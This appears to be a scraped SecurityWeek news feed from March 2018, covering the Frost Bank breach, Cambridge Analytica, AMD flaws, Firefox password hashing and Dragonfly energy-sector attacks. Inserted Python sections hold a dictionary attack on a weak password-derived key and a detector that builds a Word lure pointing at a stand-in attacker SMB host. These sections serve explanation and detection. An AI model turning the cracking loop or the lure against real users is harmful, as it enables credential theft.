SecurityWeek.webp 2018-03-19 18:35:00 Frost Bank Says Data Breach Exposed Check Images (lien direct) Frost Bank, a subsidiary of Cullen/Frost Bankers, Inc., announced on Friday that it discovered unauthorized access to images of checks stored electronically. According to the company, it discovered last week that a third-party lockbox software program had been compromised, resulting in unauthorized users being able to view and copy images of checks stored electronically in the image archive. Frost Bank systems weren't impacted in the incident, Frost says. Customers can use lockbox services to send payments to a central post office box. The bank receives the payments and credits them directly to a business's account. The information that was accessed as part of the incident could be used to forge checks, the company says. The company says it stopped the identified unauthorized access immediately after discovering it, and that it also launched an investigation into the matter. Frost says it is working with an unnamed cybersecurity firm to investigate the incident and that law-enforcement authorities have been informed as well. “At Frost, we care deeply about taking care of our customers and protecting their information, and we regret that this situation has occurred. We are working very hard to make things right,” Frost Chairman and CEO Phil Green said in a statement.
SecurityWeek.webp 2018-03-19 18:07:00 Facebook Rocked by New Data Breach Scandal (lien direct) Facebook shares plunged Monday following revelations that a firm working for Donald Trump's presidential campaign harvested data on 50 million users, as analysts warned the social media giant's business model could be at risk. Calls for investigations came on both sides of the Atlantic after Facebook responded to the explosive reports of misuse of its data by suspending the account of Cambridge Analytica, a British communications firm hired by Trump's 2016 campaign. "This is a major breach that must be investigated. It's clear these platforms can't police themselves," Democratic Senator Amy Klobuchar said on Twitter.  Expressing "serious concern regarding recent reports that data from millions of Americans was misused in order to influence voters," Klobuchar and Republican Senator John Kennedy called for Facebook chief Mark Zuckerberg and other top executives to appear before Congress, along with the CEOs of Google and Twitter. In Europe, officials voiced similar outrage. Vera Jourova, European Commissioner for Justice, Consumers and Gender Equality, called the revelations "horrifying, if confirmed," and vowed to address her concerns while travelling to the United States this week. In Britain, parliamentary committee chair Damian Collins said both Cambridge Analytica and Facebook had questions to answer following what appears to be a giant data breach, carried out in an attempt to influence voters' choices at the ballot box. "We have repeatedly asked Facebook about how companies acquire and hold on to user data from their site, and in particular whether data had been taken from people without their consent," Collins said in a statement. "Their answers have consistently understated this risk, and have also been misleading to the committee." 
'Systemic problems' On Wall Street, Facebook shares skidded 7.7 percent in midday trade amid concerns about pressure for new regulations that could hurt its business model. Brian Wieser at Pivotal Research said the revelations highlight "systemic problems at Facebook," but that they won't immediately impact Facebook revenues. Still he said "risks are now enhanced" because of the potential for regulations on how Facebook uses data for advertising and monitoring users. According to a joint investigation by The New York Times and Britain's Observer, Cambridge Analytica was able to create psychological profiles on 50 million Facebook users through the use of a personalit Guideline
SecurityWeek.webp 2018-03-19 17:23:03 (Déjà vu) AMD Chip Flaws Confirmed by More Researchers (lien direct) Another cybersecurity firm has independently confirmed some of the AMD processor vulnerabilities discovered by Israel-based CTS Labs, but the controversial disclosure has not had a significant impact on the value of the chip giant's stock. CTS Labs last week published a brief description of 13 allegedly critical vulnerabilities and backdoors found in EPYC and Ryzen processors from AMD. The company says the flaws can be exploited for arbitrary code execution, bypassing security features (e.g. Windows Defender Credential Guard, Secure Boot), stealing data, helping malware become resilient against security products, and damaging hardware. The flaws have been dubbed MASTERKEY, RYZENFALL, FALLOUT and CHIMERA, and exploiting them requires elevated privileges on the targeted machine - physical access is not required. The security firm will not disclose technical details any time soon in order to prevent abuse. CTS Labs, which no one had heard of until last week, came under fire shortly after its disclosure for giving AMD only 24 hours' notice before going public with its findings, and for apparently attempting to short AMD stock. The company later made some clarifications regarding the flaws and its disclosure method. While initially many doubted CTS Labs' claims due to the lack of technical information, an increasing number of independent researchers have confirmed that the vulnerabilities do in fact exist. Nevertheless, there are still many industry professionals who believe their severity has been greatly exaggerated. Trail of Bits was the first to independently review the findings. 
The company, which has been paid for its services, has confirmed that the proof-of-concept (PoC) exploits developed by CTS Labs work as intended, but believes that there is “no immediate risk of exploitation of these vulnerabilities for most users.” “Even if the full details were published today, attackers would need to invest significant development efforts to build attack tools that utilize these vulnerabilities. This level of effort is beyond the reach of most attackers,” Trail of Bits said in a blog post. On Monday, Check Point also confirmed two of the RYZENFALL vulnerabilities following its own review. The security firm says it does not have any relationship with CTS Labs and it has not received any payment for its services. It also noted that it does not agree with the way CTS disclosed its findings, describing it as “very irresponsible.” “In our opinion the original CTS Labs report might have been problematically phrased in a way that misrepresented the threat model and impact that the RYZENFALL-1 and RYZENFALL-3 vulnerabilities present,” Check Point said in a blog post. “However, p
SecurityWeek.webp 2018-03-19 17:07:05 Firefox Fails at Keeping Passwords Secure, Developer Claims (lien direct) Recovering Encrypted Firefox Passwords via Brute Force Attacks is Easy, Developer Says Firefox does a poor job of securing stored passwords even if the user has set up a master password, a software developer claims. According to Wladimir Palant, author of the popular Adblock Plus extension, the password manager in Firefox and Thunderbird needs some major security improvements. The manager can be made to give up its passwords in less than a minute, he says. The issue, Palant claims, lies in the way the manager converts the master password into an encryption key. The operation is performed by the sftkdb_passwordToKey() function, which applies SHA-1 hashing to a string consisting of a random salt and the actual master password. In the current implementation the SHA-1 iteration count is 1, far below the 10,000 iterations considered a practical minimum today, so an offline brute-force attack costs a single SHA-1 computation per password guess. In fact, an iteration count of at least 1,000 was considered “modest” decades ago
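To make the iteration-count point concrete, here is an added Python model (not code from Palant's post or from NSS) of the derivation the article describes: SHA-1 over salt || master password, applied once, compared against PBKDF2-HMAC-SHA1 with a 10,000-iteration work factor. The wordlist, salt and master password are constructed for the demonstration; the way extra iterations are chained in derive_key_sha1 is an assumption used only to model the cost, since the real NSS routine has further steps the article does not describe.

```python
"""A one-iteration salted SHA-1 password-to-key step versus PBKDF2: the cost of a
dictionary attack scales with the iteration count, and at 1 the attacker pays one
hash per guess.  Added illustration; not the NSS implementation."""
import hashlib
import hmac
import time


def derive_key_sha1(salt: bytes, password: str, iterations: int = 1) -> bytes:
    """Simplified model of sftkdb_passwordToKey(): SHA-1 over salt || password.
    Extra iterations (assumption, for cost modelling only) re-hash the previous digest."""
    digest = hashlib.sha1(salt + password.encode("utf-8")).digest()
    for _ in range(iterations - 1):
        digest = hashlib.sha1(digest).digest()
    return digest


def derive_key_pbkdf2(salt: bytes, password: str, iterations: int = 10_000) -> bytes:
    """The standard alternative: PBKDF2-HMAC-SHA1 with a tunable work factor."""
    return hashlib.pbkdf2_hmac("sha1", password.encode("utf-8"), salt, iterations, dklen=20)


def dictionary_attack(kdf, salt: bytes, target_key: bytes, iterations: int, candidates):
    """Recompute the key for each guess.  Returns (recovered password or None,
    KDF iterations spent), which is the attacker's cost in hash operations."""
    spent = 0
    for guess in candidates:
        spent += iterations
        if hmac.compare_digest(kdf(salt, guess, iterations), target_key):
            return guess, spent
    return None, spent


# Constructed sample data (not from the article): a tiny wordlist, a fixed salt,
# and a master password that happens to be the last entry.
WORDLIST = ["password", "letmein", "hunter2", "Tr0ub4dor&3", "qwerty123", "sunset2017"]
MASTER = "sunset2017"
SALT = bytes.fromhex("00112233445566778899aabbccddeeff")


def compare_cost():
    """Attack the same master password under both derivations.
    Returns ((found, cost) for the 1-iteration SHA-1 scheme, (found, cost) for PBKDF2)."""
    weak_key = derive_key_sha1(SALT, MASTER, 1)
    strong_key = derive_key_pbkdf2(SALT, MASTER, 10_000)
    weak = dictionary_attack(derive_key_sha1, SALT, weak_key, 1, WORDLIST)
    strong = dictionary_attack(derive_key_pbkdf2, SALT, strong_key, 10_000, WORDLIST)
    return weak, strong


if __name__ == "__main__":
    for label, kdf, iters in (("SHA-1 x1", derive_key_sha1, 1), ("PBKDF2 x10000", derive_key_pbkdf2, 10_000)):
        key = kdf(SALT, MASTER, iters)
        t0 = time.perf_counter()
        found, cost = dictionary_attack(kdf, SALT, key, iters, WORDLIST)
        print(f"{label:14s} recovered={found!r} hash_ops={cost} wall={time.perf_counter() - t0:.4f}s")
```

Both attacks recover the password from a six-word list; the difference is that the PBKDF2 variant costs 10,000 times as many hash operations per guess, which is the whole purpose of the iteration count. On a real key database the attacker also needs the salt, but that is stored next to the ciphertext, so it buys no secrecy.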
SecurityWeek.webp 2018-03-19 16:02:05 (Déjà vu) F-Secure Looks to Address Cyber Security Risks in Aviation Industry (lien direct) Aviation, as part of the transportation sector, falls within the critical infrastructure. While it may not have the same security issues as ICS/SCADA-based manufacturing and utilities, it has certain conceptual similarities, including a vital operational technology infrastructure with increasing internet connectivity and the associated cyber risks. It also has one major difference: the close physical proximity of its own customers. Catastrophic failure in the aviation industry has a more immediate and dramatic effect on customers, and for this reason alone a trusted brand image is an essential and fragile part of success in the aviation industry. Without customer trust, customers will not fly with a particular airline. Historically, aviation security has primarily focused on physical safety, and has become highly efficient in this area. But in recent years, the customization of new aircraft to provide newer and unique passenger experiences, such as the latest in internet-connected in-flight entertainment systems, has added a new cyber risk. Matthieu Gualino, deputy director of the International Civil Aviation Organization Aviation Security Training Center, described the three current areas of cyber risk as flight control (the critical systems needed to fly the aircraft: high impact, low likelihood); the operational cabin (systems used to operate and maintain aircraft: medium impact, medium likelihood); and passengers (systems with direct passenger interaction: low impact, high likelihood). The problem today is that the aviation security community is experienced in operational technology, security and safety, but less experienced in the rapidly evolving world of cyber security.
To help counter this risk, Finland's F-Secure has launched its new Aviation Cyber Security Services to help secure not just aircraft, but the entire aviation industry: aircraft, infrastructure, data, and, most importantly to F-Secure, reputation. Customers are unlikely to fly with companies they do not trust, and successful cyber-attacks rapidly eliminate customer trust and confidence; even, F-Secure suggests, a minor breach of something like an in-flight entertainment system will do so. "Off-the-shelf communication technologies are finding their way into aircraft, which makes security much more complicated than in the past," said Hugo Teso, head of aviation cybersecurity services at F-Secure and a former pilot. "Because these off-the-shelf technologies weren't necessarily created to meet the rigorous safety requirements of airlines, the aviation industry is making cyber security a top priority. But they need a partner that understands both cyber security and the details of airline operations, because it's an industry where those details make a big difference." The new service integrates security assessments of avionics, ground systems and data links, vulnerability scanners, security monitoring, incident response services, and specialized cyber security training for staff.
SecurityWeek.webp 2018-03-19 15:14:03 (Déjà vu) Cambridge Analytica: Firm at the Heart of Facebook Scandal (lien direct) At the center of a scandal over alleged misuse of Facebook users' personal data, Cambridge Analytica is a communications firm hired by those behind Donald Trump's successful US presidential bid. An affiliate of British firm Strategic Communication Laboratories (SCL), Cambridge Analytica has offices in London, New York, Washington, as well as Brazil and Malaysia. Here's the story behind the company using data to fuel political campaigns: What does Cambridge Analytica do? The company boasts it can "find your voters and move them to action" through data-driven campaigns and a team including data scientists and behavioural psychologists. "Within the United States alone, we have played a pivotal role in winning presidential races as well as congressional and state elections," with data on more than 230 million American voters, Cambridge Analytica claims on its website. Speaking to TechCrunch in 2017, CEO Alexander Nix said the firm was "always acquiring more" data. "Every day we have teams looking for new data sets," he told the site. Who are the company's clients? As well as working on the election which saw Trump reach the White House, Cambridge Analytica has been involved in political campaigns around the world. In the US, analysts harnessed data to generate thousands of messages targeting voters through their profiles on social media such as Facebook, Snapchat, or the Pandora Radio streaming service. British press have credited Cambridge Analytica with providing services to pro-Brexit campaign Leave.EU, but Nix has denied working for the group. Globally, Cambridge Analytica said it has worked in Italy, Kenya, South Africa, Colombia and Indonesia. ★★★★
SecurityWeek.webp 2018-03-19 13:51:04 (Déjà vu) Russian Cyberspies Hacked Routers in Energy Sector Attacks (lien direct) A cyberespionage group believed to be operating out of Russia hijacked a Cisco router and abused it to obtain credentials that were later leveraged in attacks targeting energy companies in the United Kingdom, endpoint security firm Cylance reported on Friday. The United States last week announced sanctions against Russian spy agencies and more than a dozen individuals for trying to influence the 2016 presidential election and launching cyberattacks, including the NotPetya attack and campaigns targeting energy firms. Shortly after, US-CERT updated an alert from the DHS and FBI to officially accuse the Russian government of being responsible for critical infrastructure attacks launched by a threat actor tracked as Dragonfly, Crouching Yeti and Energetic Bear. A warning issued last year by the UK's National Cyber Security Centre (NCSC) revealed that hackers had targeted the country's energy sector, abusing the Server Message Block (SMB) protocol and attempting to harvest victims' passwords. An investigation conducted by Cylance showed that the attacks were likely carried out by the Dragonfly group. The security firm has observed a series of phishing attacks aimed at the energy sector in the UK using two documents claiming to be resumes belonging to one Jacob Morrison. When opened, the documents fetched a template file and attempted to automatically authenticate to a remote SMB server controlled by the attackers. This template injection technique was detailed last year by Cisco Talos following Dragonfly attacks on critical infrastructure organizations in the United States. When a malicious document is opened using Microsoft Word, it loads a template file from the attacker's SMB server. 
When the targeted device connects to the SMB server, it will attempt to authenticate using the current Windows user's domain credentials, basically handing them over to the attackers. In a separate analysis of such attacks, Cylance noted that while the credentials will in most cases be encrypted, even an unsophisticated attacker will be able to recover them in a few hours or days, depending on their resources. According to Cylance, Dragonfly used this technique to harvest credentials that were later likely used to hack the systems of energy sector organizations in the United Kingdom. One interesting aspect noticed by Cylance researchers is that the IP address of the SMB server used in the template injection attack was associated with a major state-owned energy congl NotPetya
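The template-injection lure described in the two paragraphs above is visible in the document package itself: the .docx carries an attachedTemplate relationship whose Target points at another host, and Word fetches it on open. The Python below is an added example (not Cylance's or Talos's code) that builds a minimal constructed package with that relationship and checks for it; the IP 203.0.113.5 is a documentation address standing in for an attacker's SMB server, and the local Normal.dotm path is a constructed benign case.

```python
"""Spot remote-template injection in a .docx: an attachedTemplate relationship whose
target lives on another host.  Opening such a file makes Word fetch the template and,
for an SMB target, authenticate to that server with the current user's credentials.
Added example; not code from the vendors named in the article."""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")


def is_remote_target(target: str) -> bool:
    """True for UNC paths and URLs that point at another host; False for local files."""
    t = target.strip()
    if t.startswith("\\\\") or t.startswith("//"):
        return True                                   # \\host\share\x.dotm
    u = urlparse(t)
    if u.scheme in ("http", "https", "smb", "ftp"):
        return True
    if u.scheme == "file":
        # file://host/share/x.dotm carries a netloc; file:///C:/... does not.
        return bool(u.netloc) or u.path.lstrip("/").startswith("\\\\")
    return False


def find_remote_templates(docx_bytes: bytes) -> list:
    """Return [(relationship part, Id, Target)] for every attachedTemplate
    relationship in the package whose target is remote."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                if rel.get("Type") == ATTACHED_TEMPLATE and is_remote_target(target):
                    hits.append((name, rel.get("Id"), target))
    return hits


def build_docx(template_target=None) -> bytes:
    """Construct a minimal package (constructed sample, not a real lure) holding only the
    parts this check reads.  template_target, if given, becomes the attached template."""
    settings_rels = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                     f'<Relationships xmlns="{PKG_REL_NS}">')
    settings = ('<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
                'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">')
    if template_target is not None:
        settings_rels += (f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                          f'Target="{template_target}" TargetMode="External"/>')
        settings += '<w:attachedTemplate r:id="rId1"/>'
    settings_rels += "</Relationships>"
    settings += "</w:settings>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("_rels/.rels", f'<Relationships xmlns="{PKG_REL_NS}"/>')
        zf.writestr("word/settings.xml", settings)
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    lure = build_docx("file://203.0.113.5/share/template.dotm")   # constructed attacker host
    benign = build_docx("file:///C:/Users/alice/Templates/Normal.dotm")
    print("lure  :", find_remote_templates(lure))
    print("benign:", find_remote_templates(benign))
```

Run it over mail attachments or a quarantine folder: any hit is a document that will make the user's machine reach out to a foreign host at open time, which is the behaviour to block at the perimeter (outbound SMB on 445) independently of whether the template itself carries a payload.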
Last update at: 2024-08-01 00:17:02